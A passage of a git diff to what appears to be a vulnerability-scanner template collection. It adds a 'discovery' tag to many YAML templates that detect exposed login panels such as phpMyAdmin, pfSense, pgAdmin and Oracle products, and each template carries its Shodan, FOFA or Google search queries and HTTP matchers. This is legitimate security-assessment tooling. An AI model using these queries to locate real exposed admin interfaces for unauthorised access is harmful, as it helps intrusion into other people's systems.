fofa-query: title="openwrt - luci" google-query: intitle:"openwrt - luci" - tags: panel,default-login,openwrt,x-wrt + tags: panel,default-login,openwrt,x-wrt,discovery http: - method: GET diff --git a/http/exposed-panels/openx-panel.yaml b/http/exposed-panels/openx-panel.yaml index a7c87bcb488..738789d86d4 100644 --- a/http/exposed-panels/openx-panel.yaml +++ b/http/exposed-panels/openx-panel.yaml @@ -24,7 +24,7 @@ info: - icon_hash=106844876 - title="revive adserver" google-query: intitle:"revive adserver" - tags: panel,openx,revive,adserver,login,revive-adserver + tags: panel,openx,revive,adserver,login,revive-adserver,discovery http: - method: GET diff --git a/http/exposed-panels/opinio-panel.yaml b/http/exposed-panels/opinio-panel.yaml index 2ab999fb22b..333a0c7e437 100644 --- a/http/exposed-panels/opinio-panel.yaml +++ b/http/exposed-panels/opinio-panel.yaml @@ -11,7 +11,7 @@ info: verified: true max-request: 2 shodan-query: http.title:"Opinio" - tags: panel,opinio,login,detect + tags: panel,opinio,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/opnsense-panel.yaml b/http/exposed-panels/opnsense-panel.yaml index 50aeb742598..507baffce18 100644 --- a/http/exposed-panels/opnsense-panel.yaml +++ b/http/exposed-panels/opnsense-panel.yaml @@ -23,7 +23,7 @@ info: - icon_hash="-1068289244" - title="| OPNsense" - server=="OPNsense" - tags: panel,login,detect,opnsense + tags: panel,login,detect,opnsense,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-access-management.yaml b/http/exposed-panels/oracle-access-management.yaml index aabe8ee5589..a77bb8103e6 100644 --- a/http/exposed-panels/oracle-access-management.yaml +++ b/http/exposed-panels/oracle-access-management.yaml @@ -1,5 +1,5 @@ -id: oracle-access-management - +id: oracle-access-management + info: name: Oracle Access Management Login Panel - Detect author: righettod @@ -23,32 +23,32 @@ info: - title="oracle access management" - body="/oam/pages/css/login_page.css" google-query: intitle:"oracle access management" - tags: panel,oracle,login,detect + tags: panel,oracle,login,detect,discovery -http: - - method: GET - path: - - "{{BaseURL}}/oam/pages/login.jsp" - - "{{BaseURL}}" - - stop-at-first-match: true - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - part: body - words: - - "Login - Oracle Access Management" - - "/oam/pages/images" - - "/oam/server/" - condition: or - - extractors: - - type: regex - part: body - group: 1 - regex: +http: + - method: GET + path: + - "{{BaseURL}}/oam/pages/login.jsp" + - "{{BaseURL}}" + + stop-at-first-match: true + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + part: body + words: + - "<title>Login - Oracle Access Management" + - "/oam/pages/images" + - "/oam/server/" + condition: or + + extractors: + - type: regex + part: body + group: 1 + regex: - '(?i)Login\s+-\s+Oracle\s+Access\s+Management\s+([a-z0-9]+)' # digest: 4a0a00473045022100e080c563fd508451ac2862cfc65011857bf72248def8998ad9530594ae6c940f02205772dc0404777be99a1634db5fb583bb7c5f5e5e039a133a2ee84580df748a7f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/oracle-application-server-panel.yaml b/http/exposed-panels/oracle-application-server-panel.yaml index a5479733ca1..e58c4da8ec3 100644 --- a/http/exposed-panels/oracle-application-server-panel.yaml +++ b/http/exposed-panels/oracle-application-server-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"Oracle Containers for J2EE" - tags: panel,oracle,containers,login,detect + tags: panel,oracle,containers,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-business-control.yaml b/http/exposed-panels/oracle-business-control.yaml index abd0e254c70..0223a2f2ae0 100644 --- a/http/exposed-panels/oracle-business-control.yaml +++ b/http/exposed-panels/oracle-business-control.yaml @@ -21,7 +21,7 @@ info: - cpe:"cpe:2.3:a:oracle:commerce" fofa-query: title="oracle commerce" google-query: intitle:"oracle commerce" - tags: oracle,login,panel + tags: oracle,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-business-intelligence.yaml b/http/exposed-panels/oracle-business-intelligence.yaml index 525bc7871e2..12a1423179e 100644 --- a/http/exposed-panels/oracle-business-intelligence.yaml +++ b/http/exposed-panels/oracle-business-intelligence.yaml @@ -21,7 +21,7 @@ info: - http.title:"oracle business intelligence sign in" fofa-query: title="oracle business intelligence sign in" google-query: intitle:"oracle business intelligence sign in" - tags: panel,oracle,login,detect + tags: panel,oracle,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-containers-panel.yaml b/http/exposed-panels/oracle-containers-panel.yaml index 68bf24d26f4..b1f3050855f 100644 --- a/http/exposed-panels/oracle-containers-panel.yaml +++ b/http/exposed-panels/oracle-containers-panel.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel,oracle,containers + tags: panel,oracle,containers,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-ebusiness-panel.yaml b/http/exposed-panels/oracle-ebusiness-panel.yaml index 4c757cea225..9a405d11323 100644 --- a/http/exposed-panels/oracle-ebusiness-panel.yaml +++ b/http/exposed-panels/oracle-ebusiness-panel.yaml @@ -16,7 +16,7 @@ info: vendor: oracle product: e-business_suite shodan-query: http.html:"Oracle UIX" - tags: panel,oracle,login,detect + tags: panel,oracle,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-enterprise-manager-login.yaml b/http/exposed-panels/oracle-enterprise-manager-login.yaml index 8cfb0bc8b89..7bf97de83cb 100644 --- a/http/exposed-panels/oracle-enterprise-manager-login.yaml +++ b/http/exposed-panels/oracle-enterprise-manager-login.yaml @@ -13,7 +13,7 @@ info: max-request: 1 vendor: oracle product: enterprise_manager_base_platform - tags: panel,oracle,manager,login + tags: panel,oracle,manager,login,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-integrated-manager.yaml b/http/exposed-panels/oracle-integrated-manager.yaml index c066c45ffeb..33ce71e17ef 100644 --- a/http/exposed-panels/oracle-integrated-manager.yaml +++ b/http/exposed-panels/oracle-integrated-manager.yaml @@ -14,7 +14,7 @@ info: shodan-query: http.title:"Oracle(R) Integrated Lights Out Manager" product: integrated_lights_out_manager_firmware vendor: oracle - tags: oracle,login,panel + tags: oracle,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-opera-login.yaml b/http/exposed-panels/oracle-opera-login.yaml index 8804a898836..ae0dbd66c7c 100644 --- a/http/exposed-panels/oracle-opera-login.yaml +++ b/http/exposed-panels/oracle-opera-login.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: title:"Oracle Opera" && html:"/OperaLogin/Welcome.do" - tags: panel,opera,oracle,detect + tags: panel,opera,oracle,detect,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-people-enterprise.yaml b/http/exposed-panels/oracle-people-enterprise.yaml index 7f812d05a6f..b697cd86f5e 100644 --- a/http/exposed-panels/oracle-people-enterprise.yaml +++ b/http/exposed-panels/oracle-people-enterprise.yaml @@ -18,7 +18,7 @@ info: - http.title:"oracle peoplesoft enterprise" fofa-query: title="oracle peoplesoft enterprise" google-query: intitle:"oracle peoplesoft enterprise" - tags: oracle,login,panel + tags: oracle,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/oracle-peoplesoft-panel.yaml b/http/exposed-panels/oracle-peoplesoft-panel.yaml index 564dc4c95a7..34d60fd09b0 100644 --- a/http/exposed-panels/oracle-peoplesoft-panel.yaml +++ b/http/exposed-panels/oracle-peoplesoft-panel.yaml @@ -18,7 +18,7 @@ info: fofa-query: "title=\"Oracle PeopleSoft Sign-in\"" product: peoplesoft_enterprise_peopletools vendor: oracle - tags: oracle,peoplesoft,panel,login,detect + tags: oracle,peoplesoft,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/orangehrm-panel.yaml b/http/exposed-panels/orangehrm-panel.yaml index 2f1e8981692..9354687b92a 100644 --- a/http/exposed-panels/orangehrm-panel.yaml +++ b/http/exposed-panels/orangehrm-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 3 shodan-query: OrangeHRM - tags: orangehrm,hrm,login,panel + tags: orangehrm,hrm,login,panel,discovery http: - method: GET diff --git a/http/exposed-panels/orchid-vms-panel.yaml b/http/exposed-panels/orchid-vms-panel.yaml index efe84e87b90..515b93551a7 100644 --- a/http/exposed-panels/orchid-vms-panel.yaml +++ b/http/exposed-panels/orchid-vms-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"orchid core vms" fofa-query: title="orchid core vms" google-query: intitle:"orchid core vms" - tags: panel,orchid,ipconfigure + tags: panel,orchid,ipconfigure,discovery http: - method: GET diff --git a/http/exposed-panels/osasi-panel.yaml b/http/exposed-panels/osasi-panel.yaml index de742f6fd7b..fd799f7edc9 100644 --- a/http/exposed-panels/osasi-panel.yaml +++ b/http/exposed-panels/osasi-panel.yaml @@ -10,7 +10,7 @@ info: shodan-query: html:"/css/osasiasp.css" verified: true max-request: 1 - tags: osasi,panel,login,detect + tags: osasi,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/osnexus-panel.yaml b/http/exposed-panels/osnexus-panel.yaml index ab647517443..80e40129f51 100644 --- a/http/exposed-panels/osnexus-panel.yaml +++ b/http/exposed-panels/osnexus-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"OSNEXUS QuantaStor Manager" product: quantastor vendor: osnexus - tags: panel,osnexus,login + tags: panel,osnexus,login,discovery http: - method: GET diff --git a/http/exposed-panels/osticket-panel.yaml b/http/exposed-panels/osticket-panel.yaml index dee7645d85f..7736bfc3c5f 100644 --- a/http/exposed-panels/osticket-panel.yaml +++ b/http/exposed-panels/osticket-panel.yaml @@ -26,7 +26,7 @@ info: google-query: - intitle:"osticket" - intitle:"osticket installer" - tags: panel,osticket + tags: panel,osticket,discovery http: - method: GET diff --git a/http/exposed-panels/osticket/osticket-install.yaml b/http/exposed-panels/osticket/osticket-install.yaml index 1ead6fea01c..15fbb27116f 100644 --- a/http/exposed-panels/osticket/osticket-install.yaml +++ b/http/exposed-panels/osticket/osticket-install.yaml @@ -27,7 +27,7 @@ info: google-query: - intitle:"osticket" - intitle:"osticket installer" - tags: panel,osticket,install + tags: panel,osticket,install,discovery http: - method: GET diff --git a/http/exposed-panels/otobo-panel.yaml b/http/exposed-panels/otobo-panel.yaml index a72e7a65aeb..e51a0a6da52 100644 --- a/http/exposed-panels/otobo-panel.yaml +++ b/http/exposed-panels/otobo-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"otobo" - tags: panel,otobo + tags: panel,otobo,discovery http: - method: GET diff --git a/http/exposed-panels/ourmgmt3-panel.yaml b/http/exposed-panels/ourmgmt3-panel.yaml index 853dd8ce283..61880016dd3 100644 --- a/http/exposed-panels/ourmgmt3-panel.yaml +++ b/http/exposed-panels/ourmgmt3-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 2 shodan-query: http.title:"OurMGMT3" - tags: panel,ourmgmt3 + tags: panel,ourmgmt3,discovery http: - method: GET diff --git a/http/exposed-panels/outsystems-servicecenter-panel.yaml b/http/exposed-panels/outsystems-servicecenter-panel.yaml index 472765254af..8a2abb610f8 100644 --- a/http/exposed-panels/outsystems-servicecenter-panel.yaml +++ b/http/exposed-panels/outsystems-servicecenter-panel.yaml @@ -16,7 +16,7 @@ info: vendor: outsystems product: platform_server shodan-query: "http.html:\"outsystems\"" - tags: panel,outsystems,login,detect + tags: panel,outsystems,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/overseerr-panel.yaml b/http/exposed-panels/overseerr-panel.yaml index fc348334425..2fc16544671 100644 --- a/http/exposed-panels/overseerr-panel.yaml +++ b/http/exposed-panels/overseerr-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 fofa-query: Overseerr account - tags: panel,overseerr,detect + tags: panel,overseerr,detect,discovery http: - method: GET diff --git a/http/exposed-panels/pacs-connexion-utilisateur.yaml b/http/exposed-panels/pacs-connexion-utilisateur.yaml index ff3673607c6..8b02313b7ee 100644 --- a/http/exposed-panels/pacs-connexion-utilisateur.yaml +++ b/http/exposed-panels/pacs-connexion-utilisateur.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"GXD5 Pacs Connexion utilisateur" - tags: panel,login + tags: panel,login,discovery http: - method: GET diff --git a/http/exposed-panels/pagespeed-global-admin.yaml b/http/exposed-panels/pagespeed-global-admin.yaml index 8cb47ffb0f1..7e4055685a4 100644 --- a/http/exposed-panels/pagespeed-global-admin.yaml +++ b/http/exposed-panels/pagespeed-global-admin.yaml @@ -12,7 +12,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: pagespeed,panel + tags: pagespeed,panel,discovery http: - method: GET diff --git a/http/exposed-panels/pahtool-panel.yaml b/http/exposed-panels/pahtool-panel.yaml index a035062e1fc..47e46ffcb35 100644 --- a/http/exposed-panels/pahtool-panel.yaml +++ b/http/exposed-panels/pahtool-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: http.title:"PAHTool" - tags: panel,pahtool,login,detect + tags: panel,pahtool,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/pairdrop-panel.yaml b/http/exposed-panels/pairdrop-panel.yaml index 103646fa606..870db1e15a5 100644 --- a/http/exposed-panels/pairdrop-panel.yaml +++ b/http/exposed-panels/pairdrop-panel.yaml @@ -1,5 +1,5 @@ -id: pair-drop-panel - +id: pair-drop-panel + info: name: Pair Drop Panel - Detect author: rxerium @@ -12,25 +12,25 @@ info: verified: true max-request: 1 shodan-query: title:"PairDrop" - tags: panel,pairdrop,login + tags: panel,pairdrop,login,discovery -http: - - method: GET - path: - - "{{BaseURL}}" - - host-redirects: true - max-redirects: 2 - - matchers-condition: and - matchers: - - type: word - words: - - 'PairDrop' - - 'Peer2Peer' - condition: and - - - type: status - status: +http: + - method: GET + path: + - "{{BaseURL}}" + + host-redirects: true + max-redirects: 2 + + matchers-condition: and + matchers: + - type: word + words: + - '<title>PairDrop' + - 'Peer2Peer' + condition: and + + - type: status + status: - 200 # digest: 4a0a0047304502206840c9679c7868789b5fbc20bd74140bb5596c4325e89357b8ee9e6e13f783db02210094671e74eef19d06a3db7a7bfd5d90854f7733912cc0edac4204cc27f511778d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/paloalto-expedition-panel.yaml b/http/exposed-panels/paloalto-expedition-panel.yaml index fcab6480bba..d5381d7a358 100644 --- a/http/exposed-panels/paloalto-expedition-panel.yaml +++ b/http/exposed-panels/paloalto-expedition-panel.yaml @@ -12,7 +12,7 @@ info: vendor: paloaltonetworks product: expedition shodan-query: http.favicon.hash:1499876150 - tags: panel,expedition,palo-alto,login,detect + tags: panel,expedition,palo-alto,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/panabit-panel.yaml b/http/exposed-panels/panabit-panel.yaml index e2501911552..335a7d17925 100644 --- a/http/exposed-panels/panabit-panel.yaml +++ b/http/exposed-panels/panabit-panel.yaml @@ -13,7 +13,7 @@ info: metadata: max-request: 1 fofa-query: app="Panabit-智能网关" - tags: panabit,panel + tags: panabit,panel,discovery http: - method: GET diff --git a/http/exposed-panels/pandora-fms-console.yaml b/http/exposed-panels/pandora-fms-console.yaml index 19aec006ecf..55fdf27d372 100644 --- a/http/exposed-panels/pandora-fms-console.yaml +++ b/http/exposed-panels/pandora-fms-console.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.title:"pandora fms" fofa-query: title="pandora fms" google-query: intitle:"pandora fms" - tags: panel,edb,pandorafms + tags: panel,edb,pandorafms,discovery http: - method: GET diff --git a/http/exposed-panels/panos-management-panel.yaml b/http/exposed-panels/panos-management-panel.yaml index e57736911ec..9457c3fd03f 100644 --- a/http/exposed-panels/panos-management-panel.yaml +++ b/http/exposed-panels/panos-management-panel.yaml @@ -15,7 +15,7 @@ info: verified: true max-request: 1 shodan-query: http.favicon.hash:873381299 - tags: panel,panos,login,detect,paloaltonetworks + tags: panel,panos,login,detect,paloaltonetworks,discovery http: - method: GET diff --git a/http/exposed-panels/papercut-ng-panel.yaml b/http/exposed-panels/papercut-ng-panel.yaml index 9f6b56e29a9..e8f1dbe6242 100644 --- a/http/exposed-panels/papercut-ng-panel.yaml +++ b/http/exposed-panels/papercut-ng-panel.yaml @@ -31,7 +31,7 @@ info: - body='content="papercut' - body="content=\"papercut\"" zoomeye-query: app:"PaperCut" - tags: panel,papercut,detect,papercut-ng + tags: panel,papercut,detect,papercut-ng,discovery http: - method: GET diff --git a/http/exposed-panels/parallels-html-client.yaml b/http/exposed-panels/parallels-html-client.yaml index 0b96036299f..60ee8d0fc51 100644 --- a/http/exposed-panels/parallels-html-client.yaml +++ b/http/exposed-panels/parallels-html-client.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: panel + tags: panel,discovery http: - method: GET diff --git a/http/exposed-panels/parallels/parallels-hsphere-detect.yaml b/http/exposed-panels/parallels/parallels-hsphere-detect.yaml index ad478511082..8e6c90c8c47 100644 --- a/http/exposed-panels/parallels/parallels-hsphere-detect.yaml +++ b/http/exposed-panels/parallels/parallels-hsphere-detect.yaml @@ -24,7 +24,7 @@ info: google-query: - intitle:"h-sphere" - intitle:"parallels h-sphere" - tags: panel,parallels,hsphere + tags: panel,parallels,hsphere,discovery http: - method: GET diff --git a/http/exposed-panels/parse-dashboard.yaml b/http/exposed-panels/parse-dashboard.yaml index b2ec048d5d6..3c960979b50 100644 --- a/http/exposed-panels/parse-dashboard.yaml +++ b/http/exposed-panels/parse-dashboard.yaml @@ -19,7 +19,7 @@ info: - http.title:"parse dashboard" fofa-query: title="parse dashboard" google-query: intitle:"parse dashboard" - tags: panel,parse,exposure,parseplatform + tags: panel,parse,exposure,parseplatform,discovery http: - method: GET diff --git a/http/exposed-panels/passbolt-panel.yaml b/http/exposed-panels/passbolt-panel.yaml index a0f1bf8d9ca..b506069815b 100644 --- a/http/exposed-panels/passbolt-panel.yaml +++ b/http/exposed-panels/passbolt-panel.yaml @@ -16,7 +16,7 @@ info: vendor: passbolt product: passbolt_api shodan-query: http.title:"Passbolt | Open source password manager for teams" - tags: panel,passbolt,login + tags: panel,passbolt,login,discovery http: - method: GET diff --git a/http/exposed-panels/payroll-management-system-panel.yaml b/http/exposed-panels/payroll-management-system-panel.yaml index 752a786da3b..e71a5e9e393 100644 --- a/http/exposed-panels/payroll-management-system-panel.yaml +++ b/http/exposed-panels/payroll-management-system-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"Admin | Employee's Payroll Management System" product: payroll_management_system vendor: payroll_management_system_project - tags: panel,payroll + tags: panel,payroll,discovery http: - method: GET diff --git a/http/exposed-panels/pcoweb-panel.yaml b/http/exposed-panels/pcoweb-panel.yaml index 2cfcfe7c7ad..c1878f9ef95 100644 --- a/http/exposed-panels/pcoweb-panel.yaml +++ b/http/exposed-panels/pcoweb-panel.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 2 shodan-query: title:"pCOWeb" - tags: pcoweb,panel,login,detect + tags: pcoweb,panel,login,detect,discovery http: - method: GET diff --git a/http/exposed-panels/pdi-device-page.yaml b/http/exposed-panels/pdi-device-page.yaml index 0295e1e0bfc..437c85623d6 100644 --- a/http/exposed-panels/pdi-device-page.yaml +++ b/http/exposed-panels/pdi-device-page.yaml @@ -10,7 +10,7 @@ info: verified: true max-request: 1 shodan-query: html:"PDI Intellifuel" - tags: exposure,pdi,intellifuel,panel + tags: exposure,pdi,intellifuel,panel,discovery http: - method: GET diff --git a/http/exposed-panels/pega-web-panel.yaml b/http/exposed-panels/pega-web-panel.yaml index 62e8362ca5b..107c455244b 100644 --- a/http/exposed-panels/pega-web-panel.yaml +++ b/http/exposed-panels/pega-web-panel.yaml @@ -25,7 +25,7 @@ info: - intitle:"pega platform" - inurl:"/prweb/prauth/app/default" fofa-query: title="pega platform" - tags: panel,pega + tags: panel,pega,discovery http: - method: GET diff --git a/http/exposed-panels/pentaho-panel.yaml b/http/exposed-panels/pentaho-panel.yaml index 1070e9e6f32..b07361dfecd 100644 --- a/http/exposed-panels/pentaho-panel.yaml +++ b/http/exposed-panels/pentaho-panel.yaml @@ -13,7 +13,7 @@ info: shodan-query: pentaho product: vantara_pentaho vendor: hitachi - tags: panel,pentaho + tags: panel,pentaho,discovery http: - method: GET diff --git a/http/exposed-panels/peplink-panel.yaml b/http/exposed-panels/peplink-panel.yaml index ee9bc5d1b23..c00578bee8d 100644 --- a/http/exposed-panels/peplink-panel.yaml +++ b/http/exposed-panels/peplink-panel.yaml @@ -10,7 +10,7 @@ info: shodan-query: html:"PEPLINK" vendor: peplink product: balance_two_firmware - tags: panel,peplink,router,login + tags: panel,peplink,router,login,discovery http: - method: GET diff --git a/http/exposed-panels/persis-panel.yaml b/http/exposed-panels/persis-panel.yaml index 99f7cadeccb..793e8e83757 100644 --- a/http/exposed-panels/persis-panel.yaml +++ b/http/exposed-panels/persis-panel.yaml @@ -17,7 +17,7 @@ info: shodan-query: title:"Persis" product: human_resource_management_portal vendor: persis - tags: panel,persis + tags: panel,persis,discovery http: - method: GET diff --git a/http/exposed-panels/pfsense-login.yaml b/http/exposed-panels/pfsense-login.yaml index cf42a20caf5..1e607a2821e 100644 --- a/http/exposed-panels/pfsense-login.yaml +++ b/http/exposed-panels/pfsense-login.yaml @@ -23,7 +23,7 @@ info: - intitle:"pfSense - Login" - intitle:"pfsense - login" fofa-query: title="pfsense - login" - tags: panel,pfsense + tags: panel,pfsense,discovery http: - method: GET diff --git a/http/exposed-panels/pgadmin-exposure.yaml b/http/exposed-panels/pgadmin-exposure.yaml index 26c4b6b3c6b..a8ff8a9acf3 100644 --- a/http/exposed-panels/pgadmin-exposure.yaml +++ b/http/exposed-panels/pgadmin-exposure.yaml @@ -10,7 +10,7 @@ info: cwe-id: CWE-200 metadata: max-request: 1 - tags: unauth,pgadmin,postgres,panel + tags: unauth,pgadmin,postgres,panel,discovery http: - method: GET diff --git a/http/exposed-panels/phabricator-login.yaml b/http/exposed-panels/phabricator-login.yaml index f85b5968d28..b98c234b063 100644 --- a/http/exposed-panels/phabricator-login.yaml +++ b/http/exposed-panels/phabricator-login.yaml @@ -17,7 +17,7 @@ info: - html:"phabricator-standard-page" - http.html:"phabricator-standard-page" fofa-query: body="phabricator-standard-page" - tags: panel,phabricator,phacility + tags: panel,phabricator,phacility,discovery http: - method: GET diff --git a/http/exposed-panels/phoenix-contact-charx-panel.yaml b/http/exposed-panels/phoenix-contact-charx-panel.yaml index 00dd9dcccd3..2138108acb4 100644 --- a/http/exposed-panels/phoenix-contact-charx-panel.yaml +++ b/http/exposed-panels/phoenix-contact-charx-panel.yaml @@ -12,7 +12,7 @@ info: verified: true max-request: 1 shodan-query: title:"Phoenix Contact - CHARX" - tags: panel,phoenix-contact,charx,ics + tags: panel,phoenix-contact,charx,ics,discovery http: - method: GET diff --git a/http/exposed-panels/phoronix-pane.yaml b/http/exposed-panels/phoronix-pane.yaml index fc32f5d9332..e47dbe25827 100644 --- a/http/exposed-panels/phoronix-pane.yaml +++ b/http/exposed-panels/phoronix-pane.yaml @@ -16,7 +16,7 @@ info: shodan-query: http.title:"phoronix-test-suite" fofa-query: title="phoronix-test-suite" google-query: intitle:"phoronix-test-suite" - tags: panel,phoronix,phoronix-media + tags: panel,phoronix,phoronix-media,discovery http: - method: GET diff --git a/http/exposed-panels/photoprism-panel.yaml b/http/exposed-panels/photoprism-panel.yaml index d03e7486dc7..850e4c49d4f 100644 --- a/http/exposed-panels/photoprism-panel.yaml +++ b/http/exposed-panels/photoprism-panel.yaml @@ -1,30 +1,30 @@ -id: photoprism-panel - -info: - name: PhotoPrism Panel - Detect - author: rxerium,ritikchaddha - severity: info - description: | - PhotoPrism is an AI-powered photos app for the decentralized web. This template detects the presence of PhotoPrism login panel. - reference: - - https://docs.photoprism.app/getting-started/ - metadata: - verified: true - max-request: 1 - shodan-query: title:"PhotoPrism" - fofa-query: title="PhotoPrism" - tags: photoprism,panel,login,detect - -http: - - method: GET - path: - - "{{BaseURL}}/library/login" - - matchers: - - - type: dsl - dsl: - - 'status_code == 200' - - 'contains_all(body, "PhotoPrism", "login")' +id: photoprism-panel + +info: + name: PhotoPrism Panel - Detect + author: rxerium,ritikchaddha + severity: info + description: | + PhotoPrism is an AI-powered photos app for the decentralized web. This template detects the presence of PhotoPrism login panel. + reference: + - https://docs.photoprism.app/getting-started/ + metadata: + verified: true + max-request: 1 + shodan-query: title:"PhotoPrism" + fofa-query: title="PhotoPrism" + tags: photoprism,panel,login,detect,discovery + +http: + - method: GET + path: + - "{{BaseURL}}/library/login" + + matchers: + + - type: dsl + dsl: + - 'status_code == 200' + - 'contains_all(body, "PhotoPrism", "login")' condition: and # digest: 4b0a00483046022100fbbc179900b68a5628fabca3351df0ae79b47e11718a2ffbf553bc3b0e702382022100e3f854e55977c71ce50bfcfcdac24cc28069eb5a2f27277e6080dfd940fcc967:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/exposed-panels/php-mailer.yaml b/http/exposed-panels/php-mailer.yaml index 870680453ef..795e447c6c4 100644 --- a/http/exposed-panels/php-mailer.yaml +++ b/http/exposed-panels/php-mailer.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.title:"PHP Mailer" product: phpmailer vendor: phpmailer_project - tags: panel,php,mailer + tags: panel,php,mailer,discovery http: - method: GET diff --git a/http/exposed-panels/phpcollab-panel.yaml b/http/exposed-panels/phpcollab-panel.yaml index 85b9e8b68ee..7e64ac838b2 100644 --- a/http/exposed-panels/phpcollab-panel.yaml +++ b/http/exposed-panels/phpcollab-panel.yaml @@ -18,7 +18,7 @@ info: - http.title:"phpcollab" fofa-query: title="phpcollab" google-query: intitle:"phpcollab" - tags: panel,phpcollab,login + tags: panel,phpcollab,login,discovery http: - method: GET diff --git a/http/exposed-panels/phpldapadmin-panel.yaml b/http/exposed-panels/phpldapadmin-panel.yaml index f58e3118cca..cc472751379 100644 --- a/http/exposed-panels/phpldapadmin-panel.yaml +++ b/http/exposed-panels/phpldapadmin-panel.yaml @@ -12,7 +12,7 @@ info: vendor: phpldapadmin_project product: phpldapadmin shodan-query: title:"phpLDAPadmin" - tags: php,phpldapadmin,panel,detect + tags: php,phpldapadmin,panel,detect,discovery http: - method: GET diff --git a/http/exposed-panels/phpminiadmin-panel.yaml b/http/exposed-panels/phpminiadmin-panel.yaml index d80c1ed1e26..7df31dd8355 100644 --- a/http/exposed-panels/phpminiadmin-panel.yaml +++ b/http/exposed-panels/phpminiadmin-panel.yaml @@ -18,7 +18,7 @@ info: shodan-query: http.html:"phpMiniAdmin" product: phpminiadmin vendor: phpminiadmin_project - tags: panel,phpminiadmin + tags: panel,phpminiadmin,discovery http: - method: GET diff --git a/http/exposed-panels/phpmyadmin-panel.yaml b/http/exposed-panels/phpmyadmin-panel.yaml index fc281cac38e..70d80ce9975 100644 --- a/http/exposed-panels/phpmyadmin-panel.yaml +++ b/http/exposed-panels/phpmyadmin-panel.yaml @@ -23,7 +23,7 @@ info: - title="phpmyadmin" google-query: intitle:"phpmyadmin" hunter-query: app.name="phpmyadmin"&&web.body="pma_servername"&&web.body="4.8.4" - tags: panel,phpmyadmin,detect + tags: panel,phpmyadmin,detect,discovery http: - method: GET diff --git a/http/exposed-panels/phppgadmin-panel.yaml b/http/exposed-panels/phppgadmin-panel.yaml index da06997e1ff..507e5437726 100644 --- a/http/exposed-panels/phppgadmin-panel.yaml +++ b/http/exposed-panels/phppgadmin-panel.yaml @@ -23,7 +23,7 @@ info: - cpe:"cpe:2.3:a:phppgadmin_project:phppgadmin" fofa-query: title=phppgadmin google-query: intitle:phppgadmin - tags: panel,phppgadmin,phppgadmin_project + tags: panel,phppgadmin,phppgadmin_project,discovery http: - method: GET diff --git a/http/exposed-panels/pichome-panel.yaml b/http/exposed-panels/pichome-panel.yaml index f0626a9f1fc..130eff7a5c4 100644 --- a/http/exposed-panels/pichome-panel.yaml +++ b/http/exposed-panels/pichome-panel.yaml @@ -15,7 +15,7 @@ info: shodan-query: http.favicon.hash:933976300 product: pichome vendor: oaooa - tags: pichome,panel + tags: pichome,panel,discovery http: - method: GET diff --git a/http/exposed-panels/piwigo-panel.yaml b/http/exposed-panels/piwigo-panel.yaml index 41c49f1f640..8e34400d0eb 100644 --- a/http/exposed-panels/piwigo-panel.yaml +++ b/http/exposed-panels/piwigo-panel.yaml @@ -21,7 +21,7 @@ info: google-query: - Powered by Piwigo - powered by piwigo - tags: panel,piwigo,detect + tags: panel,piwigo,detect,discovery http: - method: GET diff --git a/http/exposed-panels/planet-estream-panel.yaml b/http/exposed-panels/planet-estream-panel.yaml index 53e63e6c84e..4653bf8d2f2 100644 --- a/http/exposed-panels/planet-estream-panel.yaml +++ b/http/exposed-panels/planet-estream-panel.yaml @@ -19,7 +19,7 @@ info: - http.title:"login - planet estream" fofa-query: title="login - planet estream" google-query: intitle:"login - planet estream" - tags: panel,planet,estream,planetestream + tags: panel,planet,estream,planetestream,discovery http: - method: GET diff --git a/http/exposed-panels/plastic-scm-login.yaml b/http/exposed-panels/plastic-scm-login.yaml index 62114a33186..2b95429c36c 100644 --- a/http/exposed-panels/plastic-scm-login.yaml +++ b/http/exposed-panels/plastic-scm-login.yaml @@ -11,7 +11,7 @@ info: metadata: max-request: 1 shodan-query: http.title:"Plastic SCM" - tags: panel,plastic + tags: panel,plastic,discovery http: - method: GET diff --git a/http/exposed-panels/plausible-panel.yaml b/http/exposed-panels/plausible-panel.yaml index 129b8ef55ff..000b4f6dbae 100644 --- a/http/exposed-panels/plausible-panel.yaml +++ b/http/exposed-panels/plausible-panel.yaml @@ -13,7 +13,7 @@ info: verified: true max-request: 1 shodan-query: 